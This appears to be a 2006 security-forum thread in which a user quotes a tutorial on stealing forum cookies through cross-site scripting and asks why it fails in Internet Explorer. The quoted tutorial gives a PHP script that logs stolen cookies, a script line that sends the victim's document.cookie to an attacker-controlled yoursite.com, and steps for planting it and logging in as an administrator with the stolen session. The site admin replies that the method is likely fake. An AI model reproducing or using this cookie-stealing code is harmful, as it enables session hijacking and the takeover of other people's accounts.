Waraxe IT Security Portal
Login or Register
July 14, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 92
Members: 0
Total: 92
Full disclosure
CVE-2024-33326
CVE-2024-33327
CVE-2024-33328
CVE-2024-33329
CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100
SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice
SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products
Novel DoS Vulnerability Affecting WebRTC Media Servers
APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8
40 vulnerabilities in Toshiba Multi-Function Printers
17 vulnerabilities in Sharp Multi-Function Printers
SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise)
SEC Consult SA-20240620-0 :: Arbitrary File Upload in edu-sharing (metaVentis GmbH)
Zip Slip meets Artifactory: A Bug Bounty Story
Backdoor.Win32.Plugx / Insecure Permissions
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Cross-site scripting aka XSS -> Cookie stealer only works in Firefox not IE 6 or 7
Post new topicReply to topic View previous topic :: View next topic
Cookie stealer only works in Firefox not IE 6 or 7
PostPosted: Sun Dec 24, 2006 11:35 am Reply with quote
ketchup
Regular user
Regular user
Joined: May 16, 2006
Posts: 23
Location: no




Cookie stealer only works in Firefox not IE 6 or 7

Is the problem the <script></script> part?

I used this:

(I didnt use a .gif file but a .html file)

http://forum.milw0rm.com/showthread.php?t=4621

for people who havent register at milw0rm yet:

Quote:
DaNg3R_Rul3z DaNg3R_Rul3z is online now
Junior Member

Join Date: Dec 2006
Posts: 13
Smile Steal Forum Cookies With Gif
How To Steal Cookies From A Forum With A Gif And Login With Admin Privileges Without Hash Cracking !
Use Firefox Because It's The Best Browser On The Web
U Can Download The ADD N EDIT COOKIE HACK HERE:
Code:

https://addons.mozilla.org/firefox/573/

Tested On Invision Power Board 2.1.7 <- And This Xploit Works On Much Boards !

Ok Lets Start Now

Here Is Some Files U Need...

1. ) -> Copy the below code,paste in notepad or ur fav text editor and save as cookiestealer.php (Note : Save it as cookiestealer.php not cookiestealer.php.txt)

cookiestealer.php
Code:

<?php
$filename = "logfile.txt";
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, 'a'))
{
echo ".";
exit;
}
else
{
if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
{
echo ".";
exit;
}
}
echo ".";
fclose($handle);
exit;
}
echo ".";
exit;
?>

2. ) Make a new text file and name it logfile.txt and chmod it 777 .

3. ) The malicious file fun.gif (It will redirect user to cookie stealer) .. Copy the below code and save it as fun.gif

Code:

<SCRIPT>location.href='http://yoursite.com/cookiestealer.php?cookie='+escape(document.cookie)</SCRIPT>

4. ) And a real image miniature (to show to the victim)

Ok now we have 4 files as listed below :

1. ) cookiestealer.php
2. ) logfile.txt
3. ) fun.gif
4. ) And a real image (any)

lets start now ..

Upload these files to your webspace example :

fun.gif (ftp) -> www.yoursite.com/fun.gif
cookiestealer.php (ftp) -> www.yoursite.com/cookiestealer.php
logfile.txt (ftp) -> www.yoursite.com/logfile.txt


ok now go on the victim forum .. Suppose victim forum is www.victim.com/forum/index.php

Post a new topic or reply or we can insert the malicious gif in the signature ... or where we can .. but now i do
a new topic with this bbcode :
PHP Code:

with this bbcode the victim don't see the fun.gif but the real image miniature and when he click on it ,he has a redirect
to the cookiestealer ... and we can see his cookies on :

http://yoursite.com/logfile.txt

when we have cookies we go to firefox and with the addon add n edit cookies i login with admin privileges... (first login with any user then edit cookies)

Now reload the page and you will logged in like the administrator


Enj0y.


pls help me

greetz Ketchup
View user's profile Send private message
PostPosted: Sun Dec 24, 2006 2:40 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




By the way, I don't believe, that this is an working exploit. This seems to be some sort of fake to me Sad
First of all, there are problems in IE and ONLY in IE, related to image parsing and possible script execution. And in that case attacker must be able to upload some jpg/gif picture to victim server and then IF victim opens that malicious picture (cut/paste pic address to IE url bar), THEN javascript can steal cookies.
But in this case, you described, picture is located outside of victim server/domain. So IF you can get cookies, then you will get cookies, related to YOURSITE.COM domain Smile
Or maybe there is something i miss Confused
Probably not Wink
View user's profile Send private message Send e-mail Visit poster's website
Cookie stealer only works in Firefox not IE 6 or 7
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.123 Seconds